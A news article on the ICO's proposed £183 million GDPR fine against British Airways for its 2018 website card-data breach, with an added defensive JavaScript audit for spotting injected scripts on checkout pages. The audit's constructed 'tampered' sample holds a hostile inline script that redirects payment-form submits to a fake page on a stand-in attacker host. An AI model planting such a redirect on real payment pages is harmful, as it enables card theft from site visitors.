The UK Information Commissioner's Office (ICO), the UK's GDPR supervisory authority, has issued the largest GDPR penalty to date: £183.39 million (about $228 million) against British Airways for failing to put adequate security controls in place, a failure that allowed a cyberattack on its website in 2018. British Airways can still appeal.
Before this, the ICO's largest fine was the £500,000 (about $623,000) paid by Facebook over the Cambridge Analytica scandal; that fine was issued under the previous UK data protection law, which capped penalties at £500,000. The British Airways breach occurred after the EU's GDPR took effect on May 25, 2018, so the new regime applies.
The GDPR replaced the earlier EU Data Protection Directive and, alongside a number of new privacy and security obligations, introduced far higher fines for privacy and data security failures. For the most serious violations, the maximum penalty is €20 million (about $22.4 million) or 4% of worldwide annual turnover, whichever is higher.
The £183 million penalty equals about 1.5% of British Airways' 2017 worldwide annual turnover, so the 4% cap would have allowed a fine of roughly £500 million. The cap would be calculated differently had the regulator treated BA's parent, International Airlines Group (IAG), as the undertaking being fined; IAG's 2017 global annual income was €2.27 billion.
Under the GDPR, an organisation that suffers a breach affecting EU data subjects' personal data must notify its supervisory authority (in the UK, the ICO) within 72 hours of becoming aware of it. British Airways publicly disclosed its breach and filed its report on September 6, 2018, about 24 hours after discovering it.
The ICO's investigation found that weaknesses in BA's security allowed attackers to gain unauthorized access to its website. The attackers inserted code that diverted visitors to a fraudulent page, where their personal details and credit and debit card data were harvested. The ICO said the personal and financial information of around 500,000 customers was compromised. The attack is believed to have run from some time in June 2018 until September 5, 2018.
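The kind of tampering described above (code added to a payment page that sends visitors, or their card details, to a host the site does not control) is something a site owner can check for. The following is an added example, not code from the article or from British Airways: a small offline audit of a checkout page's HTML that flags scripts loaded from hosts outside an allowlist, external scripts without Subresource Integrity, forms posting off-site, and inline scripts that reference an unexpected host. The origin, allowlist and both HTML samples are constructed for the example.

```javascript
// Added example (not the article's or BA's code): static audit of a checkout page's
// HTML for the signs of an injected redirect or skimmer. All host names are hypothetical.

const PAGE_ORIGIN = 'https://www.example-airline.test';   // assumed first-party origin
const ALLOWED_HOSTS = new Set([                            // assumed allowlist of trusted hosts
  'www.example-airline.test',
  'static.example-airline.test',
]);

// Pull one attribute value out of a raw tag string such as '<script src="..." >'.
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Resolve a possibly relative URL against the page origin and return its host (null if unparsable).
function hostOf(url) {
  try { return new URL(url, PAGE_ORIGIN).hostname; } catch { return null; }
}

// Audit the HTML. Returns an array of {kind, target, reason}; an empty array means no findings.
function auditCheckoutPage(html, allowed = ALLOWED_HOSTS) {
  const findings = [];
  const pageHost = new URL(PAGE_ORIGIN).hostname;

  // 1. External scripts must come from an allowed host, and anything not served from the
  //    page's own host should carry a Subresource Integrity hash so a swapped file fails to load.
  for (const tag of html.match(/<script\b[^>]*>/gi) ?? []) {
    const src = attr(tag, 'src');
    if (!src) continue;                                   // inline scripts handled in step 3
    const host = hostOf(src);
    if (!host || !allowed.has(host)) {
      findings.push({ kind: 'script', target: src, reason: `loaded from unexpected host ${host}` });
    } else if (host !== pageHost && !attr(tag, 'integrity')) {
      findings.push({ kind: 'script', target: src, reason: 'external script without integrity attribute' });
    }
  }

  // 2. Card data must only be posted to an allowed host.
  for (const tag of html.match(/<form\b[^>]*>/gi) ?? []) {
    const action = attr(tag, 'action') ?? PAGE_ORIGIN;    // no action means "post to this page"
    const host = hostOf(action);
    if (!host || !allowed.has(host)) {
      findings.push({ kind: 'form', target: action, reason: `posts to unexpected host ${host}` });
    }
  }

  // 3. Inline scripts: every absolute URL they mention must be on an allowed host. This is
  //    what catches a planted redirect such as location.replace('https://fake-host/...').
  const inlineRe = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  for (const m of html.matchAll(inlineRe)) {
    for (const url of m[1].match(/https?:\/\/[^\s"'`)<]+/gi) ?? []) {
      const host = hostOf(url);
      if (!host || !allowed.has(host)) {
        findings.push({ kind: 'inline-script', target: url, reason: `references unexpected host ${host}` });
      }
    }
  }
  return findings;
}

// Constructed sample pages (not real BA markup). The "clean" page is how the owner shipped it.
const CLEAN_PAGE = `<html><body>
<script src="/js/checkout.js"></script>
<script src="https://static.example-airline.test/lib.js" integrity="sha384-EXAMPLEHASH"></script>
<form id="payment" action="/api/pay" method="post"><input name="card"></form>
</body></html>`;

// The tampered page: the integrity attribute has been stripped from the library, and a
// script has been appended that sends the visitor to a fake confirmation page on submit.
const TAMPERED_PAGE = `<html><body>
<script src="/js/checkout.js"></script>
<script src="https://static.example-airline.test/lib.js"></script>
<form id="payment" action="/api/pay" method="post"><input name="card"></form>
<script>
  document.getElementById('payment').addEventListener('submit', function () {
    window.location.replace('https://payment-verify.example-evil.test/confirm');
  });
</script>
</body></html>`;

console.log('clean page findings:', auditCheckoutPage(CLEAN_PAGE));       // []
console.log('tampered page findings:', auditCheckoutPage(TAMPERED_PAGE)); // 2 findings
```

Run it with `node` against a saved copy of a payment page. The regex-based tag scanning is deliberately simple and is meant as a periodic integrity check against a known-good copy of the page, not a substitute for a Content Security Policy and Subresource Integrity on the live site, which block such injected resources in the browser rather than merely reporting them.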
The ICO did not fine BA for having been breached as such; the penalty is for the security failures that allowed the attackers unauthorized access in the first place, and it shows how seriously the regulator now treats such failures.
So far the ICO has issued only a 'Notice of Intent' to fine British Airways, and BA has 28 days to respond before it can appeal. IAG chief executive Willie Walsh said the group would take all appropriate steps to defend the airline's position, including an appeal.